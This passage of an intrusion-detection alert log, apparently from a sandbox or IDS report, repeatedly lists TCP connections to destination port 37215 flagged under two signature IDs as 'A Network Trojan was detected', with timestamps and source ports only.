          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684454
          SID:2829579
          Source Port:46988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462526
          SID:2829579
          Source Port:52484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020495
          SID:2829579
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665622
          SID:2829579
          Source Port:53286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689238
          SID:2835222
          Source Port:46600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216406
          SID:2835222
          Source Port:57688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.198277
          SID:2829579
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727604
          SID:2829579
          Source Port:55354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117212
          SID:2829579
          Source Port:52384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630448
          SID:2829579
          Source Port:34520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300874
          SID:2835222
          Source Port:54662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551245
          SID:2835222
          Source Port:59918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921131
          SID:2829579
          Source Port:44890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270632
          SID:2829579
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946702
          SID:2835222
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153945
          SID:2829579
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336479
          SID:2829579
          Source Port:52064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156454
          SID:2835222
          Source Port:42276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990262
          SID:2829579
          Source Port:60778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599084
          SID:2835222
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978973
          SID:2835222
          Source Port:54776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178380
          SID:2835222
          Source Port:38374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552288
          SID:2835222
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992374
          SID:2835222
          Source Port:43960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175957
          SID:2835222
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497531
          SID:2835222
          Source Port:41286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039828
          SID:2829579
          Source Port:41548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659714
          SID:2829579
          Source Port:56884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301354
          SID:2835222
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402449
          SID:2835222
          Source Port:59782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.076205
          SID:2829579
          Source Port:52312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926602
          SID:2829579
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.918942
          SID:2829579
          Source Port:41200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105528
          SID:2829579
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182203
          SID:2835222
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272741
          SID:2829579
          Source Port:41774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652797
          SID:2829579
          Source Port:45470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151522
          SID:2829579
          Source Port:33844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977065
          SID:2829579
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089612
          SID:2835222
          Source Port:35424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271683
          SID:2835222
          Source Port:36712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879385
          SID:2829579
          Source Port:45646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979197
          SID:2829579
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591458
          SID:2835222
          Source Port:39696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.482517
          SID:2829579
          Source Port:38002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300115
          SID:2835222
          Source Port:39608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671968
          SID:2835222
          Source Port:32930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145131
          SID:2829579
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796186
          SID:2835222
          Source Port:34228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329057
          SID:2829579
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123858
          SID:2829579
          Source Port:37400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842204
          SID:2835222
          Source Port:38986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227587
          SID:2835222
          Source Port:51620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613811
          SID:2829579
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230056
          SID:2829579
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241737
          SID:2829579
          Source Port:41184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399723
          SID:2835222
          Source Port:39318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893821
          SID:2829579
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681518
          SID:2835222
          Source Port:41484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231822
          SID:2829579
          Source Port:41360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293720
          SID:2829579
          Source Port:55730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473353
          SID:2829579
          Source Port:55496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975293
          SID:2835222
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105525
          SID:2835222
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267738
          SID:2835222
          Source Port:44602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964408
          SID:2829579
          Source Port:59864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764356
          SID:2835222
          Source Port:43384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267727
          SID:2835222
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156443
          SID:2835222
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528985
          SID:2835222
          Source Port:59532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281841
          SID:2835222
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039666
          SID:2829579
          Source Port:43098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206425
          SID:2835222
          Source Port:41656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543070
          SID:2835222
          Source Port:49752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764053
          SID:2829579
          Source Port:43574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017622
          SID:2835222
          Source Port:40314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852591
          SID:2835222
          Source Port:33534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551087
          SID:2829579
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216340
          SID:2829579
          Source Port:43192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.553693
          SID:2829579
          Source Port:53508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462094
          SID:2829579
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064406
          SID:2835222
          Source Port:50366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889916
          SID:2835222
          Source Port:53764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431528
          SID:2829579
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542678
          SID:2835222
          Source Port:37534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876506
          SID:2835222
          Source Port:47414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426469
          SID:2835222
          Source Port:42042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591711
          SID:2835222
          Source Port:37558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211885
          SID:2835222
          Source Port:54902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087642
          SID:2835222
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111591
          SID:2829579
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463489
          SID:2835222
          Source Port:42002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176490
          SID:2835222
          Source Port:51452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591746
          SID:2829579
          Source Port:36706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795943
          SID:2829579
          Source Port:37438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652463
          SID:2829579
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214750
          SID:2829579
          Source Port:37996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207057
          SID:2835222
          Source Port:56720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498807
          SID:2829579
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216378
          SID:2829579
          Source Port:59310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877727
          SID:2835222
          Source Port:44332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939437
          SID:2829579
          Source Port:46992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953346
          SID:2835222
          Source Port:53874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402026
          SID:2829579
          Source Port:43530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843149
          SID:2835222
          Source Port:56766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152165
          SID:2835222
          Source Port:51062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288460
          SID:2829579
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244819
          SID:2835222
          Source Port:39780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145409
          SID:2835222
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084156
          SID:2829579
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878023
          SID:2835222
          Source Port:50392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271587
          SID:2829579
          Source Port:50474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795143
          SID:2835222
          Source Port:54388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903387
          SID:2829579
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297741
          SID:2835222
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484874
          SID:2829579
          Source Port:42170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.110558
          SID:2835222
          Source Port:45070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483576
          SID:2835222
          Source Port:46868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548681
          SID:2835222
          Source Port:41548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.703835
          SID:2835222
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845701
          SID:2829579
          Source Port:60914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861183
          SID:2829579
          Source Port:48794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534712
          SID:2829579
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866694
          SID:2829579
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044520
          SID:2835222
          Source Port:40690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944005
          SID:2835222
          Source Port:44504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341982
          SID:2829579
          Source Port:34522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178951
          SID:2829579
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812825
          SID:2829579
          Source Port:56418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177941
          SID:2835222
          Source Port:57306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.773961
          SID:2829579
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683648
          SID:2829579
          Source Port:52482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590762
          SID:2835222
          Source Port:60670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336700
          SID:2835222
          Source Port:52558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890689
          SID:2829579
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807628
          SID:2829579
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892946
          SID:2829579
          Source Port:39222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958990
          SID:2829579
          Source Port:43756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336841
          SID:2829579
          Source Port:50114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462626
          SID:2829579
          Source Port:33242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755927
          SID:2829579
          Source Port:52798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187076
          SID:2829579
          Source Port:59382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041284
          SID:2835222
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593011
          SID:2829579
          Source Port:51162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466420
          SID:2835222
          Source Port:36970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337400
          SID:2829579
          Source Port:34690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605548
          SID:2835222
          Source Port:57306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841598
          SID:2829579
          Source Port:42734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062091
          SID:2829579
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112149
          SID:2829579
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402875
          SID:2835222
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684396
          SID:2829579
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726815
          SID:2835222
          Source Port:57976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229039
          SID:2829579
          Source Port:35880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497262
          SID:2835222
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405317
          SID:2829579
          Source Port:38112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852007
          SID:2829579
          Source Port:41252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338678
          SID:2835222
          Source Port:37294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815410
          SID:2835222
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771845
          SID:2835222
          Source Port:41614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843258
          SID:2829579
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209362
          SID:2835222
          Source Port:56142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725135
          SID:2829579
          Source Port:34760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560577
          SID:2829579
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975432
          SID:2835222
          Source Port:33286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.469698
          SID:2829579
          Source Port:60592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477923
          SID:2835222
          Source Port:52430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493110
          SID:2835222
          Source Port:58478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555279
          SID:2835222
          Source Port:48204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822896
          SID:2835222
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.378945
          SID:2835222
          Source Port:38470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178096
          SID:2829579
          Source Port:59488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975173
          SID:2829579
          Source Port:48214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173203
          SID:2835222
          Source Port:59592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.223460
          SID:2835222
          Source Port:36454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595110
          SID:2829579
          Source Port:56062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195325
          SID:2835222
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816702
          SID:2835222
          Source Port:58522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140176
          SID:2829579
          Source Port:58694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216737
          SID:2835222
          Source Port:50036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483553
          SID:2829579
          Source Port:45522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176493
          SID:2829579
          Source Port:54908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.618756
          SID:2835222
          Source Port:53060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196048
          SID:2829579
          Source Port:56956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.732787
          SID:2835222
          Source Port:46776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232742
          SID:2835222
          Source Port:43924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710999
          SID:2829579
          Source Port:42792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809948
          SID:2829579
          Source Port:39504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768505
          SID:2829579
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146047
          SID:2835222
          Source Port:35610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270843
          SID:2829579
          Source Port:34828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301235
          SID:2835222
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537387
          SID:2829579
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818997
          SID:2835222
          Source Port:60982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300594
          SID:2829579
          Source Port:58088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890100
          SID:2835222
          Source Port:57516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611791
          SID:2829579
          Source Port:56226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
